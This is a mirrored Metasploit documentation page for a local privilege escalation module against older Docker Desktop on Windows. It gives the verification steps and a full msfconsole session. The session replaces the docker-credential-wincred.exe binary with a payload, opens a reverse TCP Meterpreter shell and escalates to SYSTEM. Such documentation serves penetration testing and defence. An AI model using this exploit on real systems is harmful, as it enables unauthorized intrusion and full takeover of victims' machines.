CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/docker_credential_wincred.md
Views: 1904

Vulnerable Application

Docker Desktop Community Edition before 2.1.0.1 https://download.docker.com/win/stable/28905/Docker for Windows Installer.exe

Verification Steps

  1. Install Docker Desktop Community Edition before 2.1.0.1

  2. Start msfconsole

  3. Get a session with basic privileges

  4. Do: use exploit/windows/local/docker_credential_wincred

  5. Do: set SESSION <sess_no>

  6. Do: run

  7. Using an administrator cmd shell on the target, run docker login

  8. You should get a shell you can elevate with getsystem.

Scenarios

Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803

msf5 exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

 Name         Current Setting                            Required  Description
 ----         ---------------                            --------  -----------
 PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
 SESSION                                                 yes       The session to run this module on.


Exploit target:

 Id  Name
 --  ----
 0   Automatic


msf5 exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf5 exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM